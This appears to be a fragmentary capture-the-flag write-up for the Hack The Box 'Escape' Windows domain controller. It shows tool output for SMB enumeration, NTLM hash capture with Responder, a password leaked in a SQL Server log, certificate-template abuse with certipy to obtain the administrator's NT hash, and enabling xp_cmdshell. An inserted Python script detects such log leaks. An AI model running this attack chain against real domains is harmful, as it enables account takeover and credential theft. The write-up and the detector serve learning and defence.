```
nmap -p- --min-rate 10000 10.10.11.202

PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49668/tcp open  unknown
49691/tcp open  unknown
49692/tcp open  unknown
49708/tcp open  unknown
49712/tcp open  unknown
63474/tcp open  unknown
```
```
┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# openssl s_client -showcerts -connect 10.10.11.202:3269 | openssl x509 -noout -text
Can't use SSL_get_servername
depth=0 CN = dc.sequel.htb
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0 CN = dc.sequel.htb
verify error:num=21:unable to verify the first certificate
verify return:1
depth=0 CN = dc.sequel.htb
verify return:1
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            1e:00:00:00:04:90:52:7b:fc:91:38:74:2f:00:00:00:00:00:04
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: DC = htb, DC = sequel, CN = sequel-DC-CA
        Validity
            Not Before: Nov 18 21:20:35 2022 GMT
            Not After : Nov 18 21:20:35 2023 GMT
        Subject: CN = dc.sequel.htb
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)
                Modulus:
                    00:a6:92:78:aa:2e:fe:07:2f:e4:d9:88:f2:d4:9f:
                    37:64:9d:73:fe:ca:4e:ef:85:bd:b5:46:70:3d:f8:
                    2f:98:38:f4:28:17:f8:15:1d:c8:37:d1:ad:2e:08:
                    d5:5f:a0:87:c1:3b:5e:cf:c9:1d:97:6b:5c:e7:c1:
                    c1:f2:8f:41:e2:6c:9a:2a:3c:e1:2a:64:57:d7:47:
                    98:69:27:b4:89:c4:f9:7d:95:28:2c:3c:42:53:3e:
                    28:bb:f7:db:b4:cd:c0:52:d3:c4:5c:a0:68:92:e0:
                    67:8b:ec:7c:c0:cd:97:a5:45:d1:ce:75:d6:3c:bd:
                    f0:a9:01:6c:07:dd:69:32:e6:f5:67:3f:ca:99:ec:
                    b7:11:98:31:4f:8d:cf:74:f6:38:09:92:70:0e:fa:
                    48:51:e5:e0:db:dd:c7:1b:5a:ff:c8:ca:97:df:50:
                    19:e1:e3:cb:78:d6:03:a5:8c:e8:7c:a8:38:0b:92:
                    bf:da:66:8d:fb:04:d3:67:5b:7a:01:18:aa:01:60:
                    50:af:11:51:4c:7e:af:4c:ea:13:e8:d1:7e:e8:7c:
                    40:2d:71:71:c5:6c:3f:ec:ea:df:27:85:a5:e5:8e:
                    6e:8b:51:f9:bd:64:b5:7a:b9:d5:3c:4f:7c:6a:22:
                    63:7b:70:79:99:3b:0f:73:3c:3b:a0:a0:45:11:db:
                    33:45
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            1.3.6.1.4.1.311.20.2:
                . .D.o.m.a.i.n.C.o.n.t.r.o.l.l.e.r
            X509v3 Extended Key Usage:
                TLS Web Client Authentication, TLS Web Server Authentication
            X509v3 Key Usage: critical
                Digital Signature, Key Encipherment
            S/MIME Capabilities:
                ......0...`.H.e...*0...`.H.e...-0...`.H.e....0...`.H.e....0...+....0 ..*.H..
            X509v3 Subject Key Identifier:
                22:E2:60:5F:A1:1E:F7:90:9E:56:2A:7B:95:BB:4C:0E:DE:6C:58:87
            X509v3 Authority Key Identifier:
                62:9F:32:A3:A0:F0:38:20:D4:60:C0:CD:6D:C5:FA:51:30:5E:C3:15
            X509v3 CRL Distribution Points:
                Full Name:
                  URI:ldap:///CN=sequel-DC-CA,CN=dc,CN=CDP,CN=Public%20Key%20Services,CN=Services,CN=Configuration,DC=sequel,DC=htb?certificateRevocationList?base?objectClass=cRLDistributionPoint
            Authority Information Access:
                CA Issuers - URI:ldap:///CN=sequel-DC-CA,CN=AIA,CN=Public%20Key%20Services,CN=Services,CN=Configuration,DC=sequel,DC=htb?cACertificate?base?objectClass=certificationAuthority
            X509v3 Subject Alternative Name:
                othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
    Signature Algorithm: sha256WithRSAEncryption
    Signature Value:
        92:e4:4b:28:07:bc:2f:a3:51:de:8c:0f:4e:e7:ea:f3:7e:fd:
        56:c4:6e:88:fe:fb:6a:9a:51:98:eb:5d:c6:49:7f:6e:2d:f3:
        91:13:8b:11:26:c0:ff:b1:8e:cb:ee:c3:c8:af:c5:5f:8e:ac:
        f1:19:b2:2a:49:ed:cc:0f:8f:17:9d:45:cc:23:a5:e5:f2:ab:
        bf:85:b3:36:51:f5:0f:d0:c2:03:06:87:0a:56:08:b5:60:fd:
        ee:c8:f4:78:84:39:1b:bf:69:c1:f9:00:83:ac:5e:9d:28:4c:
        1e:cd:f6:b3:02:7e:b0:88:b3:72:80:53:df:74:a7:25:7e:26:
        1c:df:b1:e5:63:26:28:97:98:a7:a2:be:fb:cb:26:e9:27:c1:
        89:ae:95:a9:e5:78:e6:52:5a:59:63:72:45:d6:cf:6f:6b:9c:
        a4:1f:38:33:35:08:93:7b:b1:6a:0d:18:df:87:de:15:65:43:
        32:62:84:cf:2a:9b:d3:4e:d4:f2:e2:9e:95:24:3c:0a:b9:26:
        8b:ec:3a:fa:fb:e5:93:af:22:04:9b:11:ad:21:63:bb:48:a1:
        07:68:13:06:d9:31:23:02:40:37:4e:4a:5a:48:e9:f8:c9:81:
        ed:74:bc:26:69:fd:85:20:48:bf:1b:82:dc:ed:b4:21:98:37:
        dd:8b:2a:b4
read:errno=104
```
Note the certificate authority that issued this certificate: sequel-DC-CA.
SMB - TCP 445
List
Use crackmapexec to access SMB:
```
┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# crackmapexec smb 10.10.11.202 --shares
SMB         10.10.11.202    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.202    445    DC               [-] Error enumerating shares: STATUS_USER_SESSION_DELETED
```
Using any username with an empty password:
```
┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# crackmapexec smb 10.10.11.202 -u fdnotreallyausername -p '' --shares
SMB         10.10.11.202    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.202    445    DC               [+] sequel.htb\fdnotreallyausername:
SMB         10.10.11.202    445    DC               [+] Enumerated shares
SMB         10.10.11.202    445    DC               Share           Permissions     Remark
SMB         10.10.11.202    445    DC               -----           -----------     ------
SMB         10.10.11.202    445    DC               ADMIN$                          Remote Admin
SMB         10.10.11.202    445    DC               C$                              Default share
SMB         10.10.11.202    445    DC               IPC$            READ            Remote IPC
SMB         10.10.11.202    445    DC               NETLOGON                        Logon server share
SMB         10.10.11.202    445    DC               Public          READ
SMB         10.10.11.202    445    DC               SYSVOL                          Logon server share
```
Public
The only share that can be accessed is Public. Use -N for an empty password and download the PDF file:
```
┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# smbclient //10.10.11.202/Public -N
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Nov 19 06:51:25 2022
  ..                                  D        0  Sat Nov 19 06:51:25 2022
  SQL Server Procedures.pdf           A    49551  Fri Nov 18 08:39:43 2022

                5184255 blocks of size 4096. 1470835 blocks available
smb: \> get "SQL Server Procedures.pdf"
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (8.3 KiloBytes/sec) (average 8.3 KiloBytes/sec)
```
```
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL> select name from master..sysdatabases;
name
```

```
SQL> xp_cmdshell whoami
[-] ERROR(DC\SQLMOCK): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
```
```
[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.16.2]
    Responder IPv6             [dead:beef:4::1000]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Current Session Variables:
    Responder Machine Name     [WIN-H6VOL0QMDH2]
    Responder Domain Name      [ZXWC.LOCAL]
    Responder DCE-RPC Port     [49831]

[+] Listening for events...

[!] Error starting TCP server on port 53, check permissions or other servers running.
[SMB] NTLMv2-SSP Client   : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash     : sql_svc::sequel:a052ed
```
```
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         2/7/2023   8:06 AM          27608 ERRORLOG.BAK
```
ERRORLOG.BAK
This file contains logs from the SQL server:
```
*Evil-WinRM* PS C:\SQLServer\Logs> type ERRORLOG.BAK
2022-11-18 13:43:05.96 Server      Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
        Sep 24 2019 13:48:23
        Copyright (C) 2019 Microsoft Corporation
        Express Edition (64-bit) on Windows Server 2019 Standard Evaluation 10.0 <X64> (Build 17763: ) (Hypervisor)

2022-11-18 13:43:05.97 Server      UTC adjustment: -8:00
2022-11-18 13:43:05.97 Server      (c) Microsoft Corporation.
2022-11-18 13:43:05.97 Server      All rights reserved.
2022-11-18 13:43:05.97 Server      Server process ID is 3788.
2022-11-18 13:43:05.97 Server      System Manufacturer: 'VMware, Inc.', System Model: 'VMware7,1'.
2022-11-18 13:43:05.97 Server      Authentication mode is MIXED.
...[snip]...
```
At the end of the log there are these entries:
```
...[snip]...
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
...[snip]...
```
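As an added defensive example (not part of the original writeup), the following Python scans SQL Server ERRORLOG lines for the pattern above: a failed logon for a domain-qualified account followed within seconds, from the same client, by a failed logon whose "user name" carries no domain prefix. That sequence usually means a password was typed into the login field, so the log now holds a credential and should be treated as sensitive. The log lines and the 10.10.14.5 client are constructed sample data.

```python
import re
from datetime import datetime, timedelta

# Constructed sample ERRORLOG lines (same layout as the page's log, not a copy of it).
SAMPLE_LOG = """\
2022-11-18 13:43:07.40 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:45:01.10 Logon       Logon failed for user 'sequel.htb\\sql_svc'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
"""

# Matches the "Logon failed for user" entry: timestamp, quoted login name, client address.
FAILED_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d\d) Logon\s+"
    r"Logon failed for user '(?P<user>[^']*)'\..*\[CLIENT: (?P<client>[^\]]+)\]"
)


def parse_failed_logons(text):
    """Return (timestamp, login_name, client) tuples for every failed-logon line."""
    events = []
    for line in text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            events.append((ts, m["user"], m["client"]))
    return events


def find_suspect_usernames(text, window=timedelta(seconds=2)):
    """Flag a failed logon whose login name has no DOMAIN\\ prefix and arrives
    from the same client within `window` of a failure for a domain account.
    Each hit names the account and the value that is probably its password."""
    events = parse_failed_logons(text)
    suspects = []
    for (t1, u1, c1), (t2, u2, c2) in zip(events, events[1:]):
        if c1 == c2 and t2 - t1 <= window and "\\" in u1 and "\\" not in u2:
            suspects.append({"account": u1, "leaked_value": u2, "client": c2})
    return suspects


if __name__ == "__main__":
    for hit in find_suspect_usernames(SAMPLE_LOG):
        print(f"possible credential in log: {hit['account']} -> {hit['leaked_value']} from {hit['client']}")
```

Run the same function over a real ERRORLOG (and its .BAK rotations) as part of log review; a hit is a reason to rotate the account's password and restrict read access to the log directory.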
```
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 13
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
```
Note: if the error "The NETBIOS connection with the remote host timed out." appears, re-run the command.
```
┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# certipy auth -pfx administrator.pfx
Certipy v4.4.0 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee
```
Finally, pass the hash over WinRM and authenticate as the administrator user.
```
┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# ls
administrator.ccache  administrator.pfx  Certify.exe  'SQL Server Procedures.pdf'
```
```
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL>
```
```
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL> SELECT * FROM OPENROWSET(BULK N'C:\users\ryan.cooper\desktop\user.txt', SINGLE_CLOB) AS Contents
BulkColumn
```
```
SQL> xp_cmdshell whoami
[-] ERROR(DC\SQLMOCK): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
SQL> EXECUTE sp_configure 'show advanced options', 1
[*] INFO(DC\SQLMOCK): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE
SQL> EXECUTE sp_configure 'xp_cmdshell', 1
[*] INFO(DC\SQLMOCK): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE
SQL> xp_cmdshell whoami
output
```